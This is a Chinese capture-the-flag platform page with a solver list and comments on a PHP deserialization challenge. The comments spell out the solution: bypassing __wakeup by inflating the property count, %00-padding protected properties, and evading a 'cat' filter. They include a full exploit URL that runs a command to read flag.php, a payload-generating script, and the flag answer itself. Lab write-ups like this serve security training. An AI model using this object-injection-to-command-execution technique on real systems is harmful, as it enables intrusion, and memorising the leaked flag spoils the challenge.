评分(5)
解题动态
薄言. 攻破了该题 9小时前
谢特恒123 攻破了该题 14小时前
19553528229 攻破了该题 2天前
william5678 攻破了该题 6天前
dacming9527 攻破了该题 7天前
ggtom 攻破了该题 8天前
ziyou 攻破了该题 9天前
wjzkifaa 攻破了该题 9天前
hulihaha 攻破了该题 10天前
zhengjim 攻破了该题 10天前
baisui 攻破了该题 12天前
掘金 攻破了该题 13天前
027-王俊熙 攻破了该题 13天前
058-潘冰钰 攻破了该题 13天前
085-文睿 攻破了该题 13天前
gdrhdr 攻破了该题 14天前
汤布里伯 攻破了该题 16天前
wuyong5025 攻破了该题 17天前
Sonetto 攻破了该题 18天前
评论
c41vin 3年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 3年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 3年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 3年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 3年前
举报
特别要注意下url编码的问题
泡椒控卫 3年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 3年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 3年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~
YLMB001 3年前
举报
为什么我序列化后的protected属性是带有%20*%20而不是%00*%00
lysandria 3年前
举报
注意protect属性。